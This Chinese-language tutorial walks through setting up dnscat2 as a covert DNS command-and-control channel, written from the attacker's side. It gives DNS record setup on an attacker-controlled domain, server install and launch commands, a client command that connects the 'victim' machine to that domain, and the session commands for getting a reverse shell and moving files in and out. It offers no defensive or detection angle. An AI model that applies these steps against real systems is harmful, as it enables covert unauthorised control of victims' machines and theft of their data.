DNScat 堪称神器，因为它可以通过 DNS 协议创建 C&C 隧道，让攻击者更加隐蔽。你可以访问任何数据以及上传和下载文件，并且获得一个 shell。这个工具也是基于 53 端口的，所以你不需要对 DNS 服务器进行权威访问，只要通过 53 端口就能建立连接，速度会快很多，而且发送的流量都是正常流量。但是这些通信流量在数据包日志里就非常明显了，容易被发现。

什么时候可以用到 DNScat2？目标只能DNS出网的时候可以用到DNScat2.

dnscat2是一个开源软件，下载地址：https://github.com/iagox86/dnscat2

它使用DNS协议创建加密的C&C通道，严格来讲它是一个命令与控制工具。

dns 隧道分为两种，一种是直连模式，就是dns通信目标受害机器直接连接到自己的VPS服务器（C&C）

第二种是中继模式，受害者机器首先会去请求互联网上的dns服务器，最后再指向自己的VPS服务器（C&C）

一、在一台外网VPS服务器上安装Linux操作系统（作为C&C服务器），并提供一个可以配置的域名

首先创建记录A，将自己的域名解析服务器（www.saulgoodman.club）指向VPS服务器，167.xxx.xxx.xxx

然后创建 NS 记录，将 dns 子域名解析结果向 www.saulgoodman.club。其中主机记录的 dns 就是子域名，可以随便设置！

之后Ping www.saulgoodman.club 查看是否解析成功：

能 Ping 同，并且返回的是 服务器IP 的回复说明解析记录A已经设置生效。

之后使用 tcpdump 抓包（端口的53的UDP包）

sudo tcpdump -n -i eth0 dst port 53

然后使用 nslookup 命令查看Dns是否解析成功：

nslookup test.saulgoodman.club

这个时候抓包的时候就会有记录，说明ns解析成功

二、安装dnscat2服务端

在 VPS 服务器上安装dnscat2服务器端（ubuntu服务器），因为服务端是用ruby语言编写的，所以需要配置ruby环境

sudo apt-get install gemsudo apt-get install ruby-devsudo apt-get install libpq-devsudo apt-get install ruby-bundler

apt-get install gitgit clone https://github.com/iagox86/dnscat2.gitcd dnscat2/serive/sudo apt-get install libxml2-dev libxslt-devbundle install

接下来，执行如下命令，启动服务端有三种：

#启动sudo ruby./dnscat2.rb abc.com --secret=123456   #方式1【常用】sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=533,type=TXT --secret=saul #方式2sudo ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache   #方式3

ruby ./dnscat2.rb test.saulgoodman.club -e open -c saul --no-cache （我使用这个报错不知道为什么）# -W0 -Ispec 是为了不报错弹出警告，如果报错发出警告可以加上这一条参数#-e 是一个安全级别，open是服务端允许客户端不进行加密#-c 是指定一个密码# --no-cache 禁止缓存，务必在允许服务器时添加此选项，因为powershell-dnscat2客户端与dnscat2服务器的Caching模式不兼容
如果采用是直连模式，可以用下面这条命令：sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=533,type=TXT --secret=saul

三：客户端下载安装dnscat2

客户端Windows下载的话是：https://downloads.skullsecurity.org/dnscat2/

下载地址：https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip（密码：password ）

Linux 直接下载并编译：

git clone https://github.com/iagox86/dnscat2.gitcd dnscat2 /client/make

四、测试是否能通信

服务端建立后，执行如下命令，测试客户端是否能与服务端通信：

./dnscat --dns domain=dns.saulgoodman.club

这个时候服务端收到会话：

复盘过程：目标受害者上的dnscat2指定了dns为攻击者的VPS，也就是（dns.saulgoodman.club），解析 dns.saulgoodman.club 会首先在本地dns缓存中查找，没有对应记录的时候，目标dns会从互联网上的跟dns服务器查询，dns根一看域名是 saulgoodman.club ，就会给到 saulgoodman.club  的域名服务器，saulgoodman.club 域名服务器就会找 A 记录和 NS 记录。

具体过程中 dnscat2 客户端经过了互联网的dns服务器，然后再连接到我们的dns服务器，所以这就是中继模式。

五、 反弹Shell

客户端和服务端建立连接之后，服务端将处于交互模式，输入“windows”或者“session”命令，可以查看当前控制的进程（每个连接都是独立的）：

session

输入命令选择进入到目标：

session -i 1

可以输入 help 查看有哪些命令：

command (saulGoodman) 1> help
Here is a list of commands (use -h on any of them for additional help):* clear  清屏* delay  修改远程相应延时* download  下载文件* echo  * exec  执行远程机器上的指定程序* help* listen* ping* quit  切断当前会话* set  设置值，类似于 security=open* shell  得到一个反弹shell* shutdown  切断当前会话* suspend  返回上一层，相对于使用快捷键ctrl+Z* tunnels* unset* upload* window* windowscommand (saulGoodman) 1>

获取交互式 shell 模式：

shell

如上图，我们输入 shell 成功建立后得到一个 4 的会话，之后就可以使用 session -i 4 进行连接：

session -i 4

如果想退出的话，输入 exit 即可退出！

session 命令还可以看看有多少个会话：

最后，dnscat2 还提供了多域名并发的特性，可以将多个子域名绑定在同一个 NS 解析记录下，然后再服务端同时接收多个客户连接：

ruby dnscat2.rb --dns=port=53532 --security=open start --dns domain=域名1,domain=域名2

参考文章：

https://mp.weixin.qq.com/s/BmeFxYeIy5fTY_p39ktr9A

https://blog.csdn.net/weixin_41598660/article/details/106658548